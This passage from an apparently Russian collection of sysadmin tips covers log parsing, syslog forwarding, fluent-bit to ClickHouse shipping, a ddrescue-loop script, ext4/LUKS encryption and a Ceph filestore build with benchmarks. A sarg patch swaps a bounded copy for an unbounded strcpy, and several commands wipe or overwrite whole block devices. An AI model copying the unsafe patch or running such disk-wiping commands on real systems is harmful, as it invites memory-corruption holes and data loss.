permitted!<br>"; while(<$FD>) { chomp; s/gw kernel://g; if(grep(/$IP/, $_)) { print $_, "<br>\n"; } } close($FD); } else { open($GZIP, "<:gzip(lazy)", "$LOG_DIR$LOG_FILENAME.$FLAG.gz") or die "Cannot open old (", $FLAG, ") log-file!<br> File does not exist or access not permitted!<br>"; while(<$GZIP>) { chomp; s/gw kernel://g; if(grep(/$IP/, $_)) { print $_, "<br>\n"; } } close($GZIP); } } print "</pre>\n"; print "<br><br>Access stat parser by \"umask at yandex dot ru\"<br>"; print end_html; ------------------------- Для работы скрипта необходимо установить модуль PerlIO-gzip. Найти ссылку на модуль можно на cpan.org. Доступ к статистике можно получить через браузер (скрипт рассчитан для работы как CGI): hostname.ru/cgi-bin/parse.pl?192.168.1.1-0 Аргумент понимаеться так: 192.168.1.1 - искомая подстрока. 0 - норме лог файла. В данном случае текущий (в который пока ещё записываются сообщения syslog). 1 - вчерашний, 2 - позавчерашний, 3 - 3 дня назад. ..... и т.д. Для меня данное решение оказалось удобным.

Использование Sarg для анализа логов ISA 2004 Server Автор: Жека [обсудить]

После долгого копания глюков sarg с ISA 2004 Server logs, были найдены следующие решения: - формат файла должен быть w3c - необходимые для анализа поля: c-ip cs-username date time time-taken sc-bytes cs-uri sc-status - поле cs-status не должно быть последним, после него нужно включить еще какое-нибудь поле. Глюк связан с кривым разбором строки :( - формат даты в конфиге должен быть "e". - на поле миллисекунды внимания обращать не советую, чревато нервным срывом :) - для выгрузки логов на конкретную дату нужно приложить нижеследующий патчик. --- util.c.orig Fri May 13 17:05:57 2005 +++ util.c Fri May 13 17:06:09 2005 @@ -239,7 +239,7 @@ void builddia(char *dia, char *mes, char *ano, char *df, char *wdata) { - char ndia[9]; + char ndia[11]; char nmes[3]; int x; @@ -253,15 +253,15 @@ } } - snprintf(wdata,6,"%s%s%s",ano,nmes,dia); + snprintf(wdata,9,"%s%s%s",ano,nmes,dia); if(strncmp(df,"u",1) != 0) snprintf(ndia,sizeof(ndia),"%s/%s/%s",dia,nmes,ano); else snprintf(ndia,sizeof(ndia),"%s/%s/%s",nmes,dia,ano); - strncpy(dia,ndia,sizeof(dia)-1); - dia[sizeof(dia)-1]=0; + strcpy(dia,ndia); +// dia[sizeof(dia)-1]=0; return;

Как послать в syslog что-нибудь из командной строки Автор: mazaj [комментарии]

logger -sp <средство>.<уровень> -t <имя_процесса> "текст"

Как решить проблему с ведением логов у программ в chroot окружении [комментарии]

Например, в postfix запущенном в chroot, через настройки в master.cf, при перезапуске syslogd перестают писаться логи qmgr, тем временем все остальные логи пишутся нормально. Решение - необходимо создать дополнительный log сокет в chroot окружении: FreeBSD: "syslogd -l /var/spool/postfix/dev/log" Linux: "syslogd -a /var/spool/postfix/dev/log"

Почему syslogd в Linux потребляет слишком много процессорного времени. [обсудить]

Для сохранности логов syslogd при записи каждой строки в лог выполняет вызов fsync() для синхронизации данных на диск. Например, при интенсивной записи почтовых логов syslog может съесть половину времени CPU. Отключить синхронизацию можно добавив "-" перед файлом лога, например: mail.* -/var/log/maillog При экспорте логов на удаленный сервер, рекомендуется вместо доменного имени хоста использовать IP.

Как в syslog организовать прохождение логов через программу-фильтр. Автор: Gennady [комментарии]

Сначала создаем pipe: mkfifo /path/to/pipe Затем в /etc/syslog.conf пишем строчку типа: *.info |/path/to/pipe Перезапускаем syslogd: kill -1 'cat /var/run/syslogd.pid' И запускаем свою программу, которая будет читать с пайпа данные.

Как организовать сохранение syslog логов на удаленном сервере. [комментарии]

На сервере с которого поытаем логи (/etc/syslog.conf): mail.* /var/log/maillog mail.* @loger.host.ru На удаленном FreeBSD сервере, принимающем логи syslog должен запускаться без опции -s (для некоторых версий нужно указать опцию -r), удаленные хоcты ограничиваем через "-a ip1 -a ip2", рекомендую прикрыть доступ к 514 UDP порту пакетным фильтром. Пример /etc/syslog.conf: mail.* /var/log/maillog_all # логи со всех серверов +@ # +@ - выборка только для локального хоста mail.* /var/log/maillog +relay1.host.ru mail.* /var/log/maillog_relay1 +relay2.host.ru mail.* /var/log/maillog_relay2 +* # +* - отмена привязки к хосту !popa3d # далее по логи по масте программы. *.* /var/log/pop3log

Как пересылать логи с Cisco в syslog Автор: LS [комментарии]

На Cisco: router(config)# logging x.x.x.x router(config)# logging source-interface fastethernet 0/0 router(config)# logging facility local0 В syslog.conf (syslogd нужно запускать с ключем -r): local0.* /var/log/cisco.log

Отправка логов из kubernetes в clickhouse Автор: Аноним [комментарии]

Хочу поделится опытом отправки логов java-приложений, развернутых в kubernetes, в базу clickhouse. Для отправки используем fluent-bit, который настроим на отправку логов по http в формате json_stream. Пара слов о fluent-bit Fluent-bit работает с записями. Каждая запись состоит из тега и именованного массива значений.
Input Секции input указывают как и откуда брать данные, какой тег присвоить записям и в какой парсер передать их для получения массива значений. Парсер указывается параметром Parser в секции Input. В нашем случае берём теги из названия файла при помощи regexp.
Parser Секция parsers указывает как получить из сообщения массив значений. В случае с kubernetes все сообщения представляют из себя JSON с 3 полями: log, stream и time. В нашем случае поле log также содержит JSON.
Filter Пройдя парсинг, все сообщения попадают в фильтры, применение которых настраивается параметром Match. В каждый фильтр попадают только те сообщения, которые имеют тег, попадающий в regexp, указанный в Match. В нашем случае фильтры также удаляют сообщения, которые пришли из служебных namespace и лишние поля, чтобы сообщения смогли попасть в clickhouse без ошибок, даже если что-то пошло не так.
Помещение тегов в лог Fluent-bit использует теги только для маршрутизации сообщений, подразумевается, что теги не должны попадать в лог. Для того, чтобы в лог попала информаци о том в каком namespace, contaner и pod произошло событие, применяется скрипт на lua. Если распарсить сообщение не удалось или поле message оказалось пустым после парсинга, значит в выводе приложения был не JSON или он был в не верном формате. Тогда в поле message помещается всё сообщение без парсинга.
Output Секция указывает куда направить сообщения. Применение секций Output определяется параметром Match аналогично с секцией Filter. В нашем случае сообщения уходят в clickhouse по http в формате json_stream. Примеры Наши приложения выводят в логи в формате JSON в stdout, их собирает kubernetes и создает симлинки на них в /var/log/containers. Логи работы пода java-pod-5cb8d7898-94sjc из деплоймента java-pod в неймспейсе default попадают в файл вида /var/log/containers/java-pod-5cb8d7898-94sjc_default_java-pod-08bc375575ebff925cff93f0672af0d3d587890df55d6bd39b3b3a962fc2acb9.log Пример записи {"log":"{\"timeStamp\":\"2021-11-24T11:00:00.000Z\",\"message\":\"My message id: 8543796, country: RU\",\"logger\":\"com.YavaApp.app.service.YavaService\",\"thread\":\"http-nio-8080-exec-2\",\"level\":\"INFO\",\"levelValue\":40000}\n","stream":"stdout","time":"2021-11-24T11:00:00.000000000Z"} Как видно из примера, в JSON-записи, поле log содержит в себе экранированный JSON, который также нужно разобрать, а из имени файла понятно к какому поду, деплою и неймспейсу принадлежит запись. Clickhouse По умолчанию clickhouse слушает команды по протоколу http на порту 8123. Менять эти настройки нет необходимости. Создадим в clickhouse схему logs и таблицу log в ней. create database logs; use logs; create table logs.log( pod_time DateTime('Etc/UTC'), namespace String, container String, pod String, timeStamp String, stream String, thread String, level String, levelValue Int, logger String, message String ) ENGINE = MergeTree PARTITION BY toYYYYMM(pod_time) ORDER BY pod_time; Файлы конфигурации Файл конфигурации fluent-bit для kubernetes будет выглядеть примерно так: apiVersion: v1 kind: ConfigMap metadata: labels: k8s-app: fluent-bit name: fluent-bit namespace: monitoring data: filter.conf: | [FILTER] Name lua Match * script make_tags.lua call make_tags [FILTER] Name grep Match kube.* Exclude namespace monitoring Exclude namespace metallb-system Exclude namespace gitlab-managed-apps Exclude namespace kube-* [FILTER] Name record_modifier Match kube.* Whitelist_key pod_time Whitelist_key namespace Whitelist_key container Whitelist_key pod Whitelist_key timeStamp Whitelist_key stream Whitelist_key thread Whitelist_key level Whitelist_key levelValue Whitelist_key logger Whitelist_key message Record cluster k8s-test fluent-bit.conf: | [SERVICE] Flush 1 Log_Level info Daemon off Parsers_File parsers.conf @INCLUDE filter.conf @INCLUDE input.conf @INCLUDE output.conf input.conf: | [INPUT] Name tail Path /var/log/containers/*.log Parser kub-logs Refresh_Interval 5 Mem_Buf_Limit 20MB Skip_Long_Lines On DB /var/log/flb_kube_default.db DB.Sync Normal Tag kube.<namespace_name>.<container_name>.<pod_name> Tag_Regex (?<pod_name>[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*)_(?<namespace_name>[^_]+)_(?<container_name>.+)- make_tags.lua: | function make_tags(tag, timestamp, record) new_record = record local tag_list = {} for s in string.gmatch(tag, "[^.]+") do table.insert(tag_list, s) end new_record["namespace"] = tag_list[2] new_record["container"] = tag_list[3] new_record["pod"] = tag_list[4] if (record["message"] == nil) then new_record["message"] = record["log"] end return 1, timestamp, new_record end output.conf: | [OUTPUT] Name http Host clickhouse-address Port 8123 URI /?user=user&password=pass&database=logs&query=INSERT%20INTO%20log%20FORMAT%20JSONEachRow Format json_stream Json_date_key pod_time Json_date_format epoch parsers.conf: | [PARSER] Name kub-logs Format json Time_Key time Time_Format %Y-%m-%dT%H:%M:%S.%L # Command | Decoder | Field | Optional Action # ==============|==============|=========|================= Decode_Field_As escaped_utf8 log do_next Decode_Field json log Конфигурация DaemonSet, который развернет по одному инстансу fluent-bit на каждой рабочей ноде. apiVersion: apps/v1 kind: DaemonSet metadata: name: fluent-bit namespace: monitoring labels: k8s-app: fluent-bit spec: selector: matchLabels: k8s-app: fluent-bit template: metadata: labels: k8s-app: fluent-bit spec: priorityClassName: system-node-critical containers: - name: fluent-bit image: fluent/fluent-bit:1.8 imagePullPolicy: Always volumeMounts: - name: config mountPath: /fluent-bit/etc/fluent-bit.conf subPath: fluent-bit.conf - name: config mountPath: /fluent-bit/etc/input.conf subPath: input.conf - name: config mountPath: /fluent-bit/etc/output.conf subPath: output.conf - name: config mountPath: /fluent-bit/etc/parsers.conf subPath: parsers.conf - name: config mountPath: /fluent-bit/etc/filter.conf subPath: filter.conf - name: config mountPath: /fluent-bit/etc/make_tags.lua subPath: make_tags.lua - name: var-log mountPath: /var/log - name: var-lib-fluent mountPath: /var/lib/fluent - name: var-lib-docker mountPath: /var/lib/docker readOnly: true - name: run-log mountPath: /run/log - name: etcmachineid mountPath: /etc/machine-id readOnly: true volumes: - name: config configMap: defaultMode: 420 name: fluent-bit - name: var-log hostPath: path: /var/log - name: var-lib-fluent hostPath: path: /var/lib/fluent - name: var-lib-docker hostPath: path: /var/lib/docker - name: run-log hostPath: path: /run/log - name: etcmachineid hostPath: path: /etc/machine-id type: File

Диски и файлы

CD-ROM, CD-R, AudioCD:

RAID массивы

Ramdisk, tmpfs

Диагностика и Восстановление после сбоя

Квоты

Монтирование

Резервное копирование

Файловые системы

Cкрипт ddrescue-loop с функцией автоматической остановки/перезапуска диска на SATA порту (доп. ссылка 1) Автор: gumanzoy [комментарии]

Cкрипт ddrescue-loop v0.1 с функцией автоматической остановки/перезапуска диска на SATA порту. Предназначен для упрощения процесса восстановления данных с неисправных SATA SSD. В случаях когда после ошибок чтения - SSD перестает возвращать данные и требует остановки/перезапуска. Для работы не требуется реле для отключения питания. Использует интерфейсы ядра udev /dev и sysfs /sys. Рекомендуется материнская плата с поддержкой AHCI. На платформах Intel начиная с Soc-1156 и на AMD AM4/AM5 нужно включать Hot Plug в UEFI BIOS Setup для каждого порта отдельно. На более старых AMD, но у которых в чипсете есть поддержка AHCI - сразу должно работать ничего специально включать не нужно. ddrescue-loop -ata N [-loop N] [-wait N] [-act N] outfile mapfile [ddrescue options] ddrescue-loop -ata N -stop Остановить диск на SATA порту N ddrescue-loop -ata N -scan Cканировать SATA порт N Номер соответствует порту на мат.плате, но нумерация всегда начинается с 1, а не с 0 как на платах Gigabyte например. См. вывод dmesg Функция циклической остановки/перезапуска диска на SATA порту: -loop N Предельное число попыток N целое число. Указывать обязательно. Таймер ожидания остановки/перезапуска диска: -wait N Время в секундах. 10 по умолчанию. В конце после mapfile можно указать опции запуска ddrescue Код ddrescue-loop: #!/bin/sh #ddrescue-loop script writen by gumanzoy <gumanzoy@gmail.com> # Compatible only with Linux, not with other *nix! # Depends on udev /dev and sysfs /sys kernel interfaces # Requires SATA AHCI compatible motherboard # For all Intel and modern AMD platforms (AM4 and newer), check the UEFI Setup # SATA settings to ensure Port Hot Plug is enabled # [RU] forum thread. Обсуждение # https://forum.ixbt.com/topic.cgi?id=11:47589-31 # /* This program is free software. It comes without any warranty, to # * the extent permitted by applicable law. You can redistribute it # * and/or modify it under the terms of the Do What The Fuck You Want # * To Public License, Version 2, as published by Sam Hocevar. See # * http://www.wtfpl.net/ for more details. */ VERSION=0.1 showhelp () { echo "ddrescue-loop v""$VERSION"" перезапускает процесс ddrescue в случае его завершения" echo "Внимание следует соблюдать очередность аргументов" echo "Указывать ключи в произвольном порядке нельзя!" echo "Числовые значения аргументов обязательно через пробел" echo -n "\n" echo "# Остановить/запустить диск на SATA порту:" echo "-ata <n> -stop"" ""остановить диск на SATA порту <n>" echo "-ata <n> -scan"" ""сканировать SATA порт <n>" echo -n "\n" echo "# Запустить восстановление:" echo "ddrescue-loop -ata <n> [-loop <n>] [-wait <n>] [-act <n>] outfile mapfile [ddrescue options]" echo -n "\n" echo "# Укажите номер SATA порта к которому подключен диск источник:" echo -n "-ata <n>"" ""Номер SATA порта <n> цифра (смотрите вывод dmesg)" echo -n "\n"" ""#: "; ls /sys/class/ata_port echo -n "\n" echo "# Функция циклической остановки/перезапуска диска на SATA порту:" echo "-loop <n>"" ""<n> предельное число попыток" echo -n "\n" echo "# Таймер ожидания остановки/перезапуска диска:" echo "-wait <n>"" ""Время в секундах <n> [10]" echo -n "\n" echo "# Переопределить таймаут ожидания исполнения ATA команд:" echo "-act <n>"" ""Время в секундах <n> [1..30]" echo -n "\n" echo "# Основные:" echo "outfile"" ""Устройство приемник данных / файл образа" echo "mapfile"" ""ddrescue map/log файл (обязательно)" echo -n "\n" echo "# В конце после mapfile можно указать опции запуска ddrescue через пробел" echo "# Поддержка зависит от версии. Полный список опций в мануале. Важные:" echo "-P [<lines>]"" ""Предпросмотр данных [число строк] по умолчанию 3" echo "-b 4096"" ""Размер сектора (физического блока) [default 512]" echo "-O"" #Рекомендую! ""После каждой ошибки заново открывать файл устройства" echo "-J"" #Опционален ""При ошибке перечитать последний не сбойный сектор" echo "-r <n> #ИЛИ -r -1"" ""<n> число повторных проходов до перехода к trim" echo "-m <domain.mapfile>"" ""Ограничить область чтения доменом <file> ddru_ntfsbitmap" } get_ata_host () { until SCSIHOST=`readlink -f /sys/class/ata_port/ata"$1"/device/host?/scsi_host/host?/` \ && test -d "$SCSIHOST"; do sleep 1; done } get_ata_target () { until SYSFSTGT=`readlink -f /sys/class/ata_port/ata"$1"/device/host?/target?:?:?/?:?:?:?/` \ && test -d "$SYSFSTGT"; do sleep 1; done } get_ata_dev () { until INDEV=`readlink -f /dev/disk/by-path/pci-*-ata-"$1"` \ && test -b "$INDEV"; do sleep 1; done } if [ "$1" = "-h" -o "$1" = "--help" ]; then showhelp exit; fi if [ "`whoami`" != "root" ]; then echo Exit. This script should be run as root ! exit 1; fi if [ -n "$1" ] && [ "$1" = "-ata" ]; then if [ -n "$2" ] && test -d /sys/class/ata_port/ata"$2"; then SATAP="$2"; get_ata_host "$SATAP"; shift; shift else echo -n "Please enter correct port number: "; ls /sys/class/ata_port; exit 1; fi fi if [ -n "$1" ] && [ "$1" = "-loop" ]; then if [ -n "$2" ] && [ "$2" -gt 0 ]; then DDLOOP="$2"; shift; shift; fi else DDLOOP=0 fi if [ -n "$1" ] && [ "$1" = "-wait" ]; then if [ -n "$2" ] && [ "$2" -gt 0 ]; then LOOPWAIT="$2"; shift; shift; fi else LOOPWAIT=10 fi if [ -n "$1" ] && [ "$1" = "-act" ]; then if [ -n "$2" ] && [ "$2" -gt 0 -a "$2" -lt 30 ]; then ATACMDT="$2"; shift; shift; fi fi if [ -n "$1" ] && [ "$1" = "-stop" ] && [ -n "$SATAP" ]; then get_ata_target "$SATAP" while test -f "$SYSFSTGT"/delete; do echo 1 > "$SYSFSTGT"/delete; sleep 1; done exit; fi if [ -n "$1" ] && [ "$1" = "-scan" ] && [ -n "$SATAP" ]; then echo '0 0 0' > "$SCSIHOST"/scan; exit; fi if [ -z "$SATAP" ]; then showhelp exit; fi OUTFILE="$1"; shift MAPFILE="$1"; shift DDOPTS="$@" DONE=X LOOPCOUNT=0 until [ "$DONE" = 0 ]; do get_ata_target "$SATAP"; get_ata_dev "$SATAP" if [ -n "$ATACMDT" ]; then echo "$ATACMDT" > "$SYSFSTGT"/timeout fi echo ddrescue "-fd" "$INDEV" "$OUTFILE" "$MAPFILE" "$DDOPTS" ddrescue "-fd" "$INDEV" "$OUTFILE" "$MAPFILE" $DDOPTS DONE="$?" if [ "$DONE" != 0 ] && [ "$DDLOOP" -gt 0 ]; then sleep "$LOOPWAIT" while test -d "$SYSFSTGT"; do echo 1 > "$SYSFSTGT"/delete sleep "$LOOPWAIT"; done sleep "$LOOPWAIT" && echo '0 0 0' > "$SCSIHOST"/scan DDLOOP=$(($DDLOOP-1)) LOOPCOUNT=$(($LOOPCOUNT+1)) echo "\n\033[1mDDLOOP" "#""$LOOPCOUNT" tput sgr0 date echo -n "\n" else DONE=0 fi done

Шифрование данных на существующем разделе ext4 без его переформатирования (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Можно отметить два основных способа организации шифрования данных в уже существующей файловой системе Ext4, не требующие пересоздания раздела с переносом данных из резервной копии. Первый способ заключается в использовании встроенных в Ext4 возможностей по шифрованию отдельных каталогов, а второй в использовании команды "cryptsetup reencrypt" для прозрачного переноса ФС на новый шифрованный раздел LUKS. В любом случае создание полной резервной копии перед выполнением предложенных манипуляций обязательно. Первый способ наиболее простой и безопасный, но он ограничен использованием отдельных шифрованных каталогов, в которые можно перенести конфиденциальные данные, требующие защиты. Шифрование в Ext4 поддерживается при использовании как минимум ядра Linux 4.1 и утилит 2fsprogs 1.43. Выставляем в суперблоке раздела c ФС ext4 флаг поддержки шифрования (в нашем случае /dev/sda1): sudo tune2fs -O encrypt /dev/sda1 Создаём каталог, в котором будут храниться зашифрованные данные текущего пользователя: mkdir -p /secret/home/user Генерируем случайную salt-последовательность для последующего шифрования и сохраняем её в отдельный файл: echo 0x`head -c 16 /dev/urandom | xxd -p` > /home/user/.crypt_salt Создаём на базе данной salt-последовательности ключ для шифрования, указав для него пароль: e4crypt add_key -S /home/user/.crypt_salt Enter passphrase (echo disabled): Added key with descriptor [f467134ca2c48c33] Проверяем добавление ключа командой "keyctl show", которая поставляется в пакете keyutils. Активируем шифрование для каталога /secret/home/user, указав выданный идентификатор ключа: e4crypt set_policy f467134ca2c48c33 /secret/home/user Если после перезагрузки попытаться обратится к каталогу /secret/home/user без добавления ключа командой "e4crypt add_key", его содержимое будет показано в зашифрованном виде. Для расшифровки каталога при каждой загрузке необходимо настроить повторный вызов команды add_key для привязки ключа. e4crypt add_key -S /home/user/.crypt_salt Enter passphrase (echo disabled): Added key with descriptor [f467134ca2c48c33] Для просмотра привязанного к каталогу ключа можно использовать команду e4crypt get_policy /secret/home/user В случае необходимости шифрования всего содержимого можно использовать LUKS cryptsetup для шифрования имеющегося раздела без потери данных. Отмонтируем шифруемый раздел (при изменении корневого раздела нужно загрузиться с отдельного live-дистрибутива), проверяем целостность ФС и уменьшаем размер ФС для того, чтобы разместить заголвки LUKS на диске (в ФС должно быть достаточно свободного места): e2fsck -f /dev/sda4 resize2fs /dev/sda4 размер_меньше_текущего_на_32МБ Шифруем содержимое имеющегося раздела без потери информации: cryptsetup reencrypt --encrypt /dev/sda4 --reduce-device-size 32M Открываем раздел: cryptsetup open /dev/sdXY home Увеличиваем размер ФС до свободной границы resize2fs /dev/mapper/home Монтируем раздел: mount /dev/mapper/home /mnt/home Смотрим UUID: blkid /dev/mapper/home Добавляем информацию о разделе в /etc/crypttab home UUID=UUID_устройства_LUKS none

История про Ceph и реплику 1+2 Автор: alex [комментарии]

Обратился как-то знакомый с вопросом можно ли c Ceph реализовать реплику 1+2. Было 2 сервера OSD и требовалось сделать хранилище, причём только на запись (операции чтения не больше 10 процентов, а 90 процентов это запись). В виду горького раннего опыта с данной репликой и файловым Ceph пытался отговорить его от этого, но интерес взял своё. Итак задача звучала так: есть 2xOSD, в каждом 24 HDD диска по 8T и 4 SSD по 400G Основной задачей было обеспечение надёжности без применения CRUSH Map. Требовалось:
Ceph 2xOSD + 3MON,
Ceph: Версия не важно но
1 Обязательно файловая
2 Вынос журналов на SSD, то есть 1 SSD на 6 HDD дисков Железо осмотр: OSD все на intel C610/X99 CPU : 2 x Xeon(R) CPU E5-2620 v4 @ 2.10GHz RAM : 192G DIMM DDR4 M393A4K40BB0-CPB Video: AST1150 ASPEED Technology, Inc. HDD: 2xINTEL SSDSC2BA20 LAN : 2 x 1G I210 (ILO + Управление) LAN : 2 x 82599ES 10-Gigabit SFI/SFP+ Network Connection (на борту) LAN : 2 x MT27520 Family [ConnectX-3 Pro] 40-Gigabit QFP+ Mellanox Technologies Внешний JBOD SAS3008 PCI-Express Fusion-MPT SAS-3 24 x HDD HUH728080AL5204 (HGST) 7452GiB 7200rpm 4 x SDD HUSMM1640ASS204 (HGST) 372GiB Первое что было сделано это обновлены все биосы и прочее, что могло обновляться включая HDD: 2xINTEL SSDSC2BA20 установлен дистрибутив Ubuntu 18.04.1 LTS HDD: 2xINTEL SSDSC2BA20 были объедены в MD зеркало (бортовой аппаратный райд не помог т.к. в итоге система не видела 2 диска как единое блочное устройство) в итоге получилось 1G /boot (MD0) 16G SWAP на каждом диске 170G / также выделил 3 сервера одинаковых для mon и один сервер для настроек с которого собственно и буду все поднимать серверы одинаковые: ProLiant DL360 G5 CPU: 2xIntel(R) Xeon(R) CPU E5420 @ 2.50GHz RAM: 8G HDD: 2x148 на базе аппаратного Smart Array Controller P400i LAN: 2xNetXtreme II BCM5708 Gigabit Ethernet (Broadcom Limited) собрав все в зеркало и установил систему Ceph Подключаем репозиторий. Раз версия не важна то используем Mimic (13.2.0), остальных версий под указанный дистрибутив нет. 1. компьютер установщика: wget -q -O- 'https://download.ceph.com/keys/release.asc' | sudo apt-key add - echo "deb https://download.ceph.com/debian-mimic/ bionic main" > /etc/apt/sources.list.d/ceph.list apt update apt upgrade apt install ceph-common ceph-deploy 2. добавим ключи с машины инсталлятора, чтобы ходить по ssh без пароля 3. определимся с сетью в качестве коммутатора у заказчика Mellanox SX1024 1 12x40G + 48x10G что вполне со слов заказчика достаточно на первое время 2 Dlink 36xx для сети 1G и портом 10G на всякий случай для стыковки с мелланоксом сеть public-network 10.0.0.0/24 cluster-network 10.200.0.0/24 mon01 10.0.0.1/24 mon02 10.0.0.2/24 mon03 10.0.0.3/24 osd01 10G 10.0.0.4/24 40G 10.200.0.4/24 osd02 10G 10.0.0.5/24 40G 10.200.0.5/24 слепил я и оповестил файлы /etc/hosts этими значениями Инсталляция начнём как рекомендуется в документации, с мониторов 1. установим демон точного времени apt install chrony на OSD серверах шлюзов не будет, соответственно настроим сразу получение времени с mon01-03 2. Установим мониторы и сразу MGR ceph-deploy install --mon --release=mimic mon0{1,2,3} ceph-deploy install --mgr --release=mimic mgr0{1,2,3} ceph-deploy install --osd --release=mimic osd0{1,2} 3. Создадим кластер ceph-deploy new --public-network 10.0.0.0/24 mon0{1,2,3} добавим мониторы ceph-deploy mon create mon0{1,2,3} раздадим ключи ceph-deploy gatherkeys mon0{1,2,3} добавим в начальный файл конфигурации mon_allow_pool_delete = true cluster network = 10.200.0.0/24 osd pool default size = 2 osd pool default min size = 1 osd mkfs options xfs = -f -s size=4096 и раздадим его всем cp *.keyring ceph.conf /etc/ceph/ добавим mgr ceph-deploy mgr create mgr0{1,2,3} раздадим и проверим конфигурацию на всех серверах и проверим ceph ceph -s cluster: id: 6dae468a-ac29-4cc6-a3e1-7b2a7247eb5b health: HEALTH_OK services: mon: 3 daemons, quorum mon01,mon02,mon03 mgr: mgr01(active), standbys: mgr02, mgr03
Займёмся osd ssh osd01 прогоним все диски parted -s /dev/sdj mklabel gpt почистим диски /usr/sbin/ceph-volume zap /dev/sdh ................ /usr/sbin/ceph-volume zap /dev/sdo и повторим то же на OSD02 вернёмся на инсталлиционый сервер и для теста создадим пару OSD с двух OSD серверов можно ещё раз проделать это с инсталляционного сервера ceph-deploy disk zap osd01:sdh ceph-deploy disk zap osd02:sdh ceph-deploy disk zap osd01:sdi ceph-deploy disk zap osd02:sdi
/dev/sdh это HDD OSD01
/dev/sdh это HDD OSD02
/dev/sdi это SSD OSD01
/dev/sdi это SSD OSD02 напомним, версия ФАЙЛОВАЯ и журналы на SSD без параметров, создаётся bluestore ceph-deploy osd create --filestore --data /dev/sdh --journal /dev/sdi osd01 ceph-deploy osd create --filestore --data /dev/sdh --journal /dev/sdi osd02
Убедимся что все верно ceph-deploy osd list osd01 ceph-deploy osd list osd02 клиент предупредил, что тестировать будет и нужно минимум 4 диска ну 4 так 4 проделал с остальными тоже самое в итоге 4 диска ceph osd tree ID CLASS WEIGHT TYPE NAME STATUS REWEIGHT PRI-AFF -1 352.22583 root default -7 176.11292 host osd01 0 hdd 7.27739 osd.0 up 1.00000 1.00000 1 hdd 7.27739 osd.1 up 1.00000 1.00000 2 hdd 7.27739 osd.2 up 1.00000 1.00000 3 hdd 7.27739 osd.3 up 1.00000 1.00000 0 ssd 0.36389 osd.0 up 1.00000 1.00000 1 ssd 0.36389 osd.1 up 1.00000 1.00000 2 ssd 0.36389 osd.2 up 1.00000 1.00000 3 ssd 0.36389 osd.3 up 1.00000 1.00000 -7 176.11292 host osd02 0 hdd 7.27739 osd.0 up 1.00000 1.00000 1 hdd 7.27739 osd.1 up 1.00000 1.00000 2 hdd 7.27739 osd.2 up 1.00000 1.00000 3 hdd 7.27739 osd.3 up 1.00000 1.00000 0 ssd 0.36389 osd.0 up 1.00000 1.00000 1 ssd 0.36389 osd.1 up 1.00000 1.00000 2 ssd 0.36389 osd.2 up 1.00000 1.00000 3 ssd 0.36389 osd.3 up 1.00000 1.00000 Видно что SSD нормально определился напомню, что проблема с правкой крушмапа осталась в версии до 12.x.x. далее подготовим pg ceph osd crush rule create-replicated hdd default host hdd ceph osd pool create hdd-rbd 512 ceph osd pool set hdd-rbd crush_rule hdd для тестов подойдёт и не забываем что на SSD у нас журналы и за ними надо следить !! подготовим для теста RBD rbd create --size 1T --image-feature layering,exclusive-lock --image hdd-rbd/test --image-feature именно такие так как будем использовать ядерный модуль, а с другими параметрами он не цепляется Дополним cat /etc/ceph/rbdmap hdd-rbd/test id=admin,keyring=/etc/ceph/ceph.client.admin.keyring и примонтируем rbdmap map проверим ls /dev/rbd/hdd-rbd/test /dev/rbd/hdd-rbd/test и появилось у нас новое устройство /dev/rbd0 померим hdparm -Tt /dev/rbd0 /dev/rbd0: Timing cached reads: 8226 MB in 2.00 seconds = 4122.93 MB/sec Timing buffered disk reads: 1636 MB in 3.00 seconds = 545.21 MB/sec dd if=/dev/zero of=/dev/rbd0 bs=1G count=1 oflag=direct 1+0 records in 1+0 records out 1073741824 bytes (1,1 GB, 1,0 GiB) copied, 10,0574 s, 107 MB/s попробуем, что скажет fio fio --name=writefile --size=1G --filesize=1G --filename=/dev/rbd0 --bs=1M --nrfiles=1 \ --direct=1 --sync=0 --randrepeat=0 --rw=write --refill_buffers --end_fsync=1 --iodepth=200 --ioengine=libaio writefile: (g=0): rw=write, bs=(R) 1024KiB-1024KiB, (W) 1024KiB- 1024KiB, (T) 1024KiB-1024KiB, ioengine=libaio, iodepth=200 fio-3.1 Starting 1 process Jobs: 1 (f=1): [W(1)][83.3%][r=0KiB/s,w=20.0MiB/s][r=0,w=20 IOPS][eta 00m:02s] writefile: (groupid=0, jobs=1): err= 0: pid=6404: Thu Aug 9 19:50:56 2018 write: IOPS=109, BW=110MiB/s (115MB/s)(1024MiB/9320msec) ну и случайное fio --time_based --name=benchmark --size=1G --runtime=30 --filename=/dev/rbd0 --ioengine=libaio \ --randrepeat=0 --iodepth=128 --direct=1 --invalidate=1 --verify=0 --verify_fatal=0 --numjobs=4 \ --rw=randwrite --blocksize=4k --group_reporting benchmark: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=128 ... fio-3.1 Starting 4 processes Jobs: 4 (f=4): [w(4)][100.0%][r=0KiB/s,w=80.2MiB/s][r=0,w=20.5k IOPS][eta 00m:00s] benchmark: (groupid=0, jobs=4): err= 0: pid=6411: Thu Aug 9 19:53:37 2018 write: IOPS=19.8k, BW=77.2MiB/s (80.9MB/s)(2315MiB/30006msec) slat (usec): min=4, max=199825, avg=193.15, stdev=1838.51 clat (msec): min=3, max=1348, avg=25.70, stdev=28.44 lat (msec): min=3, max=1349, avg=25.89, stdev=28.54 clat percentiles (msec): | 1.00th=[ 12], 5.00th=[ 14], 10.00th=[ 16], 20.00th=[ 17], | 30.00th=[ 19], 40.00th=[ 20], 50.00th=[ 21], 60.00th=[ 22], | 70.00th=[ 24], 80.00th=[ 26], 90.00th=[ 30], 95.00th=[ 41], | 99.00th=[ 155], 99.50th=[ 169], 99.90th=[ 363], 99.95th=[ 401], | 99.99th=[ 827] bw ( KiB/s): min= 4444, max=26995, per=25.07%, avg=19805.94, stdev=5061.73, samples=240 iops : min= 1111, max= 6748, avg=4951.28, stdev=1265.42, samples=240 lat (msec) : 4=0.01%, 10=0.30%, 20=44.53%, 50=51.12%, 100=1.34% lat (msec) : 250=2.50%, 500=0.18%, 750=0.01%, 1000=0.01%, 2000=0.01% cpu : usr=3.38%, sys=5.67%, ctx=75740, majf=0, minf=37 IO depths : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=0.1%, >=64=100.0% submit : 0=0.0%, 4=100.0%, 8=0.0%, 